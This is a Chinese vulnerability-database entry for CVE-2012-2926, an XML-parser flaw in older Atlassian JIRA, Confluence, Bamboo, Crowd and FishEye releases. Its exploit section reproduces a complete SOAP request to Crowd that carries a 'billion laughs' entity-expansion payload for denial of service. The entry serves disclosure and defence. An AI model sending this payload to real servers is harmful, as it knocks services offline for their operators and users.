多个Atlassian 产品权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121143 漏洞类型 权限许可和访问控制
发布时间 2012-05-17 更新时间 2012-05-23
CVE编号 CVE-2012-2926 CNNVD-ID CNNVD-201205-330
漏洞平台 JSP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/37218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-330
|漏洞详情
多个Atlassian产品中存在漏洞,该漏洞源于未正确限制第三方XML解析器的能力。远程攻击者可利用该漏洞借助未明向量读取任意文件,或导致拒绝服务(资源耗尽)。以下产品存在该漏洞:AtlassianJIRA5.0.1之前版本,Confluence3.5.16之前版本、4.0.7之前的4.0版本、4.1.10之前的4.1版本,FishEye和Crucible2.5.8之前版本、2.6.8之前的2.6版本、2.7.12之前的2.7版本,Bamboo3.3.4之前版本和3.4.5之前的3.4.X版本,Crowd2.0.9之前版本、2.1.2之前的2.1版本、2.2.9之前的2.2版本、2.3.7之前的2.3版本和2.4.1之前的2.4版本。
|漏洞EXP
source: http://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateApplication>
         <urn:in0>
            <aut:credential>
               <aut:credential>stuff1</aut:credential>
               <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
            </aut:credential>
            <aut:name>stuff3</aut:name>
            <aut:validationFactors>
               <aut:ValidationFactor>
                  <aut:name>stuff4</aut:name>
                  <aut:value>stuff5</aut:value>
               </aut:ValidationFactor>
            </aut:validationFactors>
         </urn:in0>
      </urn:authenticateApplication>
   </soapenv:Body>
</soapenv:Envelope>
|参考资料

来源:XF
名称:jira-xml-dos(75697)
链接:http://xforce.iss.net/xforce/xfdb/75697
来源:BID
名称:53595
链接:http://www.securityfocus.com/bid/53595
来源:SECUNIA
名称:49146
链接:http://secunia.com/advisories/49146
来源:confluence.atlassian.com
链接:http://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2012-05-17
来源:confluence.atlassian.com
链接:http://confluence.atlassian.com/display/FISHEYE/FishEye+and+Crucible+Security+Advisory+2012-05-17
来源:confluence.atlassian.com
链接:http://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2012-05-17
来源:confluence.atlassian.com
链接:http://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17
来源:confluence.atlassian.com
链接:http://confluence.atlassian.com/display/BAMBOO/Bamboo+Security+Advisory+2012-05-17